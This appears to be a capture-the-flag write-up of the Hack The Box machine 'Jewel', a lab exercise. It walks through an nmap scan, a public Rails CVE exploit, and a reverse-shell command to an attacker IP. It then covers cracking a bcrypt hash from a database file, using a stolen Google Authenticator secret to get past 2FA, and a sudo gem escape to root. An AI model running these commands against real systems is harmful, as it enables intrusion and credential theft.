Jewel ~ Hack The Box

Jewel ~ Hack The Box

·

3 min read


Prerequisite

Jewel ~ Hack The Box

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

echo "10.10.10.211 jewel.htb" >> /etc/hosts

hosts file entry

Jewel ~ Hack The Box

Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

nmap -Pn -sC -sV -A -p- -oN initial jewel.htb

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA) | 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA) |_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519) 8000/tcp open http Apache httpd 2.4.38 |http-generator: gitweb/2.20.1 git/2.20.1 | http-methods: | Supported Methods: GET HEAD POST OPTIONS | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.38 (Debian) | http-title: jewel.htb Git |_Requested resource was jewel.htb:8000/gitweb 8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6) |http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E | http-methods: | Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6 |_http-title: BL0G!

Scanning & Enumeration

Based on the scan that was run, I realized that port 8000 was running a web server. This was the web app that was being served!

Jewel ~ Hack The Box

Jewel ~ Hack The Box

Enumerating further revealed the app that was running and its version.

  • Rails = V 5.2.2.1

I was able to find an existing CVE for this version of rails and a POC.

Exploitation

With the help of the POC, I was able to gain a minimal shell on the remote box that was running rails 5.2.2.1.

First I had to create an account on the blog which was running on port 8080

Jewel ~ Hack The Box

Once I had that account created, I was ready to run the exploit.

Jewel ~ Hack The Box

┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel] └─# python3 exploit.py 10.10.10.211 8080 nee "bash -c 'bash -i >& /dev/tcp/10.10.14.47/666 0>&1'"

Jewel ~ Hack The Box

User.txt flag

I was able to gain a stable shell to the user account.

Privilege Escalation

For this, I utilized Linpeas as I always do! The privesc script returned a password hash belonging to bill.

Jewel ~ Hack The Box

Jewel ~ Hack The Box

[+] Searching specific hashes inside files - less false positives (limit 70) /home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

I headed off to crack the password with my trusty dictionary from seclists and good ol' john!

Jewel ~ Hack The Box

┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel] └─# john password.hash -w=passwd.dict

Followed by that, I tried to run sudo -l to see what binaries.

Jewel ~ Hack The Box

However, I was hit with a 2FA request which prevented me from running the command. After looking around for a bit, I realized that there was a .google_authenticator file in the home directory of bill.

Jewel ~ Hack The Box

bill@jewel:~$ cat .google_authenticator 2UQI3R52WFCLE6JTLDCSJYMJH4 " WINDOW_SIZE 17 " TOTP_AUTH

I then activated the authenticator on my phone and was able to get it working!~

Jewel ~ Hack The Box

And finally, I was able to run sudo -l using bill's account without any issues.

Jewel ~ Hack The Box

Now that I knew bill could run gem with sudo privileges, all there was left to do was head to GTFObins and get root!

sudo gem open -e "/bin/sh -c /bin/sh" rdoc

Jewel ~ Hack The Box

rooty!